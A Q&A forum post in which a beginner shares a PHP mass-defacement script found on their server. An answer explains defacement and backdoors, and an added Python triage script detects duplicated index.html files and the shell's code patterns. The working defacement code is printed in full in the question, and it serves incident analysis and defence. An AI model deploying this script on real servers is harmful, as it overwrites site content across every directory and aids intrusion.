What is this script running?

5

I'm a beginner in the area and found this file on my server:

<?php
/*
Script: Mass Deface Script
*/
// Output is wrapped in a <textarea> so whoever submits the form gets a log of
// every file the script touched.
echo "<center><textarea rows='10' cols='100'>";
// Both values come straight from the POST form below: the URL (or local path)
// the defacement page is fetched from, and the directory whose subdirectories
// get overwritten. Nothing is validated.
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";

if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        // Walk every entry directly under $dir. $dir must end with a slash
        // (the form default getcwd()."/" supplies one) because no separator
        // is added. readdir() also returns "." and "..", so $dir itself and
        // its parent directory are hit as well.
        while (($file = readdir($dh)) !== false) {
            if (filetype($dir.$file) == "dir") {
                // Target is <subdir>/index.html; an existing file is simply overwritten.
                $newfile = $dir.$file."/index.html";
                echo $newfile."\n";
                // copy() accepts a URL as source when allow_url_fopen is on, so this
                // downloads the attacker's page and writes it over each index.html.
                if (!copy($defaceurl, $newfile)) {
                    echo "failed to copy $file...\n";
                }
            }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>


<!-- Fragment of the shell's own HTML panel: the form that feeds the two POST
     fields above. The stray </td> and </div> belong to a larger page that was
     not included here. -->
<td align=right>Mass Defacement:</td><br>
</div>
<!-- basename() is called without echo, so the action attribute ends up empty
     and the browser posts back to the current URL, i.e. to this same file. -->
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>

Can you help me understand what this file was running?

asked by anonymous 27.07.2015 / 15:19

1 answer

3

The script returns the current directory where this file is located, checks if it is manipulable, and creates a new index.html file.

Mass Defacement

The defacers are not selective in their targets; in most cases they use automatic tools to find vulnerable servers, and automatically exploit them. The exploit automatically uploads a backdoor to the compromised server which will provide, for example, shell access to the compromised server. The defacer can launch further attacks via the backdoor, such as trying to escalate privileges using local kernel exploits, or reporting the compromised server to a defacement archive. These backdoors are also sold on the black market, enabling buyers to, for example, turn a compromised server into a DDoS network, or use it as a spam relay host.

They are fixed-target attacks: they scan sites with vulnerabilities and exploit them, and can replace files, copy them, or even use the server for spam and DDoS.

In other words, your site is somehow vulnerable and has allowed a third party access to the server.

27.07.2015 / 15:54
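The script above leaves two things behind that are easy to hunt for once you know how it works: the same downloaded page written to index.html in many directories, and the PHP file itself, which passes POST-controlled values into copy(). The following triage script is an added example, not part of the question or the answer; it builds a constructed web root in a temporary directory (site names, file contents and the planted x.php are invented for the demo) and reports both artefacts.

```python
"""Triage for the mass-deface script discussed above (added example).

It walks a web root and reports:
  1. index.html files whose content is identical across several directories
     (the copy($defaceurl, ...) loop writes one page everywhere), and
  2. PHP files that feed $_POST / $_GET / $_REQUEST values into copy(),
     the construct the posted shell is built on.
The sample tree below is constructed for the demo; paths are not real.
"""
import hashlib
import os
import re
import tempfile
from collections import defaultdict

# Indicators taken from the posted script: a request-controlled source handed to
# copy(), and the shell's own field names.
SHELL_PATTERNS = [
    re.compile(r"copy\s*\(\s*\$_(POST|GET|REQUEST)\b"),
    re.compile(r"massdefaceurl|massdefacedir"),
]


def index_html_groups(webroot):
    """Map sha256 digest -> list of index.html paths with that content."""
    groups = defaultdict(list)
    for dirpath, _dirs, files in os.walk(webroot):
        if "index.html" in files:
            path = os.path.join(dirpath, "index.html")
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            groups[digest].append(path)
    return groups


def defaced_groups(webroot, min_copies=2):
    """Digests shared by at least min_copies distinct index.html files."""
    return {h: sorted(p) for h, p in index_html_groups(webroot).items()
            if len(p) >= min_copies}


def suspicious_php(webroot):
    """PHP files matching at least one shell indicator pattern."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                src = fh.read()
            if any(p.search(src) for p in SHELL_PATTERNS):
                hits.append(path)
    return sorted(hits)


def build_sample_webroot():
    """Constructed tree: three defaced vhosts, one untouched, one planted shell."""
    root = tempfile.mkdtemp(prefix="webroot-")
    deface = b"<html><body>owned</body></html>"
    for site in ("site-a", "site-b", "site-c"):
        os.makedirs(os.path.join(root, site))
        with open(os.path.join(root, site, "index.html"), "wb") as fh:
            fh.write(deface)
    os.makedirs(os.path.join(root, "site-d"))
    with open(os.path.join(root, "site-d", "index.html"), "wb") as fh:
        fh.write(b"<html><body>Welcome to site D</body></html>")
    # The dropped shell, reduced to the one line that matters for detection.
    with open(os.path.join(root, "site-a", "x.php"), "w") as fh:
        fh.write("<?php copy($_POST['massdefaceurl'], $_POST['massdefacedir']); ?>")
    # A legitimate copy() with literal paths must not trigger.
    with open(os.path.join(root, "site-d", "backup.php"), "w") as fh:
        fh.write("<?php copy('/var/www/a.txt', '/tmp/a.txt'); ?>")
    return root


def triage(webroot):
    """Return (defaced index.html paths, PHP files with shell indicators)."""
    groups = defaced_groups(webroot)
    defaced = sorted(p for paths in groups.values() for p in paths)
    return defaced, suspicious_php(webroot)


if __name__ == "__main__":
    root = build_sample_webroot()
    defaced, shells = triage(root)
    print("identical index.html across directories:")
    for p in defaced:
        print("  ", p)
    print("PHP files with shell indicators:")
    for p in shells:
        print("  ", p)
```

Point triage() at a real document root after replacing build_sample_webroot(); the hash grouping also catches defacements that the attacker renamed, since it keys on content rather than on file names, while the regex list is deliberately narrow so that ordinary copy() calls with literal paths are not flagged.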